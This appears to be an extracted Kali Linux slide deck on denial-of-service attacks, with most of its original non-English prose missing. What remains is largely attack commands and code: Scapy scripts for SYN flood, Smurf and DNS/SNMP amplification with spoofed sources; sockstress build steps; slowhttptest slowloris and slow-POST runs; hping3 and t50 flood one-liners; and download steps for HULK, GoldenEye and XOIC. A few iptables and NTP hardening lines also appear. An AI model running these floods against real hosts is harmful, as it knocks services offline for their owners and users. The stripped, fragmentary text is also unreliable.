Kali Linux

The quieter you become the more you are able to hear
[email protected]
▪ DoS DOS
– Denial of Service

▪ DDoS
–
–

▪
– ping
–
▪ Bill gates
▪
▪ D
▪ Anonymous
–
–
– DDoS
–
–
– Guy Fawkes
– 4chan
– DDoS

▪
– We are Anonymous We are a Legion
We do not forgive We do not forget
Expect us.
DoS

▪ D
– Flood
– ICMP Flood UDP Flood

▪ D
–
– Syn Flood Ping of Death ARP DNS 802.11 SSL

▪ D
–
– CC
–
–

▪
 DoS

▪
– —>FW—> OS—>

▪
–
– FW
– CPU I/O
– OS

▪
–
–

▪
DDoS
Syn-Flood

▪ IP
–

▪ Scapy
– i=IP()
– i.dst=1.1.1.1
– i.display()
– t=TCP()
– sr1(i/t,verbose=1,timeout=3)
– sr1(IP(dst=1.1.1.1)/TCP())
 Syn-Flood

▪ : ./syn_flood.py
– iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 1.1.1.1 -j DROP
– netstat -n | awk '/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}'
– windows 10
LISTEN S
SYN-SENT C
SYN-RECV S
ESTABLISHED C/S TCP
FIN-WAIT-1 C/S
FIN-WAIT-2 C/S
CLOSE-WAIT C/S /
CLOSING C/S
LAST-ACK C/S
TIME-WAIT C/S 4
CLOSED C/S
IP

▪ DoS
▪ IP
– IP

▪
–

▪ TCP
Smurf

▪ DDoS
– ICMP echo Request ping
– LAN
– ping

▪ Scapy
– i=IP()
– i.dst="1.1.1.255"
– p=ICMP()
– p.display()
– r=(i/p)
– send(IP(dst="1.1.1.255",src="1.1.1.2")/ICMP(),count=100,verbose=1)
Sockstress

▪ 2008 Jack C. Louis

▪ Python
– ./sockstress.py 1.1.1.1 21 200

▪ C
– https://github.com/defuse/sockstress
– gcc -Wall -c sockstress.c
– gcc -pthread -o sockstress sockstress.o
– ./sockstress 1.1.1.1:80 eth0
– ./sockstress 1.1.1.1:80 eth0 -p payloads/http

▪
– iptables -A OUTPUT -p TCP --tcp-flags rst rst -d 1.1.1.1 -j DROP
Sock stress

▪
– Netstat
– Free
– Top
Sockstress

▪
– sockstress DoS
– TCP syn cookie
–
– IP TCP
▪ 30 80 10 IP
▪ iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --set
▪ iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --update --
seconds 30 --hitcount 10 -j DROP
▪ DDoS
TearDrop

▪ 95 98 3.x nt
– 2.x android 6.0 IOS

▪
– IP

▪
–
! PAYLOAD 1480 offset "
MAC IP DATA DATA FCS

! Total Length 1500 "

▪ Ping teardrop
teardrop.cap

▪ windows SMB
– teardrop_smb.py

▪ Android IOS
– teardrop_android_ios.py

▪
DNS

▪
–
–
–

▪ DNS
–
– dig ANY hp.com @202.106.0.20 8

▪
–
– DNS DNS DDoS
DNS

▪ Scapy
– IP/UDP/DNS/DNS
i=IP() u=UDP() d=DNS()
i.dst="202.106.0.20" u.display() d.rd=1
i.src="1.1.1.1" u.dport d.qddount=1
i.display() d.display()
q=DNSQR() d.qd=q r= (i/u/d)
q.qname='hp.com' d.display() r.display()
q.qtype=255 r sr1(r)
q.display() send(r)

▪ IP DNS
SNMP

▪
– Simple Network Management Protocol
– UDP 161 / 162
– ( manager / ) ( agent / )
– MIB

– OID
– IETF MIB / MIB

▪
–
–
 SNMP

▪ SNMP
– community
i=IP() u=UDP() s=SNMP()
i.dst=“1.1.1.1" u.dport=161 s.community= 'public'
i.display() u.sport=161 s.display()
b=SNMPbulk()
b.display()
b.max_repetitions = 100
b.varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1')),SNMPvarbind(oid=ASN1_OID('
1.3.6.1.2.1.19.1.3'))]
s.PDU=b r= (i/u/s) Sr1(r)
snmp.display() r.display()
NTP

▪
– Network Time Protocol
–
–
–
– UDP 123

▪
– NTP monlist MON_GETLIST
▪ NTP
– NTP 600 IP
▪ 6 IP 100 100
NTP

▪ NTP
– nmap -sU -p123 1.1.1.1 / 127.0.0.1

▪
– ntpdc -n -c monlist 1.1.1.1
– ntpq -c rv 1.1.1.1
– ntpdc -c sysinfo 192.168.20.5

▪
– /etc/ntp.conf
▪ restrict -4 default kod nomodify notrap nopeer noquery
▪ restrict -6 default kod nomodify notrap nopeer noquery
NTP

▪ NTP
– ntpd 4.2.7p26 monlist
– monlist
 DoS

▪
–
– OS

▪
–
– DoS
–

▪ CesarFTP 0.99
– ftp_fuzz.py # MKD/RMD

▪ Ms12-020 DoS
 DoS

▪ Slowhttptest google
– DoS CC
– Python Linux win Cygwin OSX
– apache tomcat

▪
– Slowloris Slow HTTP POST
▪ Http Syn flood
▪ HTTP
DoS
▪ Slowloris http \r\n\r\n \r\n……
▪ Slow POST HTTP content-length body
 DoS

▪
– Slow Read attack
▪ slowloris and slow POST
▪
▪ TCP window
– Apache Range Header attack
▪ HTTP Body
▪ CPU
 DoS

▪ ulimite -n 70000
▪ HTTP Post
– slowhttptest -c 1000 -B -g -o body_stats -i 110 -r 200 -s 8192 -t FAKEVERB
-u http://1.1.1.1 -x 10 -p 3

▪ slowloris
– slowhttptest -c 1000 -H -g -o header_stats -i 10 -r 200 -t GET -u http://
1.1.1.1 -x 24 -p 3

▪
▪
–

▪ /
–
–
▪ RUDY
– HTTP POST slowhttptest
–
– “ ”
– WEB
– https://sourceforge.net/projects/r-u-dead-yet/
▪ Hping3
– TCP/IP FW

▪ Syn Flood
– hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 1.1.1.1
– hping3 -S -P -U -p 80 --flood --rand-source 1.1.1.1
– hping3 -SARFUP -p 80 --flood --rand-source 1.1.1.1 TCP Flood

▪ ICMP Flood
– hping3 -q -n -a 1.1.1.1 --icmp -d 56 --flood 1.1.1.2

▪ UDP Flood
– hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood 1.1.1.2
▪ LAND
– SYN Flood
–
– hping3 -n -a 1.1.1.1 -S -d 100 -p 80 --flood 1.1.1.1

▪ TCP DoS
– nping --tcp-connect --rate=10000 -c 1000000000 -q 1.1.1.1

▪ IP
– nping --echo-client "public" echo.nmap.org --udp
▪ Siege
– http/https
– siege -g http://1.1.1.1/a.php / 1.1.1.1
– siege -i -c 1000
– url -f
▪ /etc/siege/urls.txt

▪ T50
– t50 1.1.1.1 --flood --turbo -S --protocol TCP --dport 80
– t50 1.1.1.1 --flood --turbo -S TCP UDP OSPF EIGRP --dport 22
▪ Nmap
– grep dos /usr/share/nmap/scripts/script.db | cut -d "\"" -f 2
▪ DoS
– LOIC
– HOIC
– DDoSer

▪ DoS IP
▪ XOIC
– IP
– git clone git://git.code.sf.net/p/xoic/code xoic-code
– https://xoicdoser.wordpress.com/
– test normal DoS Attack
– TCP/HTTP/UDP/ICMP
▪ HULK - Http Unbearable Load King
– Python
–
– WEB
– https://packetstormsecurity.com/files/download/112856/hulk.zip
▪ DDOSIM
– 7
– IP
– TCP
– DDoS
– HTTP HTTP DDoS
– SMTP DDoS
– TCP
▪ GoldenEye
– http/https
– Python
– keep-alive
– wget https://github.com/jseidl/GoldenEye/archive/master.zip
– unzip master.zip
– ./goldeneye.py http://1.1.1.1 -w 50
Thanks